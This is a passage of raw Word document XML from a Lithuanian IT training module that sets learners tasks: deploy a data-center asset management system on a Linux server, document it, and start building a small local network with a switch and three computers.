              <w:t>Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1426" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53D3E65B" w14:textId="463E6944" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Programinės įrangos pavadinimas: versija / namų puslapio adresas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2576" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03391F82" w14:textId="77777777" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Aprašas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="710" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="417A67AA" w14:textId="77777777" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Mokama / Nemokama (sąlygos)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="15B41469" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="455A60DB" w14:textId="77777777" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="00850702" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="82"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1426" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3742913E" w14:textId="77777777" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="00850702" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2576" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0FCACFA4" w14:textId="77777777" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="00850702" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="710" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="728C916E" w14:textId="77777777" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="00850702" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1E88328B" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="387FC5E7" w14:textId="77777777" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="00850702" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="82"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1426" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="18D80CE1" w14:textId="77777777" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="00850702" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2576" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3372E509" w14:textId="77777777" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="00850702" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="710" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="59C9672E" w14:textId="77777777" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="00850702" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00850702" w:rsidRPr="005A5C28" w14:paraId="1AB35551" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6A07C860" w14:textId="77777777" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>..</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1426" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="479EE876" w14:textId="77777777" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="00850702" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2576" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3648CBB0" w14:textId="77777777" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="00850702" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="710" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="21BAEA18" w14:textId="77777777" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="00850702" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CDCB98C" w14:textId="098148FC" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="00850702" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AC727BE" w14:textId="098148FC" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4"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UŽDUOTIS: Paruošti veikiančią sistemą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754C95D6" w14:textId="098148FC" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4"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Duomenų centro ir serverių kambario turto valdymo sistemos įgyvendinimo etapai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161D2FA7" w14:textId="0CBBC8F3" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Įdie</w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> serveryje operacinę sistemą Linux arba paruoš</w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">kite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">turimą (įdiegtą) Linux sistemą programinės įrangos diegimui. Serveris gali būti fizinis arba virtualus įrenginys. Serveris turi būti pasiekiamas </w:t>
      </w:r>
      <w:r w:rsidR="00E0244B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>vietin</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>iame tinkle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B9C559" w14:textId="7717808B" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Parink</w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> vieną programinę įrangą iš jau atrinktų (užpildykite lentelę). Savo pasirinkimą ir poreikį fiksuokite „PASLAUGŲ UŽKLAUSOS“ sistemoje (jeigu tokią turite) ir pateikite pasirinktos programinės įrangos dokumentaciją (reikalavimai sistemai, reikalingų resursų kiekis ir pan.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D4E391" w14:textId="098148FC" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Atlikite įrangos diegimą ir užtikrinkite pasiekiamumą tinkle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472AEB72" w14:textId="53D62954" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Sudarykite pagrindinių sistemos funkcijų naudojimosi vadovą ir publikuokite </w:t>
      </w:r>
      <w:r w:rsidR="00E0244B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>vietin</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>iame tinkle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54974FFA" w14:textId="098148FC" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Suteikite prieigą sistemos naudotojams sistemos testavimui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE4024F" w14:textId="098148FC" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="00850702" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05397E66" w14:textId="098148FC" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B2BF89" w14:textId="65917341" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12 Open Source/Commercial Software for Data Center Infrastructure Management (2020,</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rugpjūčio 25). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tecmint</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId135">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.tecmint.com/data-center-server-management-tools/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="296AB241" w14:textId="409157DB" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>How to Setup RackTables, a Datacenter and Server Room Asset Management for Linux (2017,</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sausio 3). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tecmint</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId136">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.tecmint.com/datacenter-server-room-assets-management-with-racktables-linux/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D452606" w14:textId="2B987B47" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Best IP Address Management Tools for Linux (2020,</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">vasario 13). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tecmint</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId137">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.tecmint.com/ip-address-management-tools-for-linux/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="59250D3C" w14:textId="3B1422B4" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075844EA" w14:textId="40AD2A71" w:rsidR="006D6864" w:rsidRPr="005A5C28" w:rsidRDefault="007D6C3C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3075E295" w14:textId="26DCC33C" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „Kompiuterių tinklų administravimas“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35822E1E" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E301362" w14:textId="5A3808B9" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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1</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NAUDODAMI KOMUTATORIŲ IR TRIS KOMPIUTERIUS</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SUDARYKITE LOKALŲ KOMPIUTERIŲ TINKLĄ</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
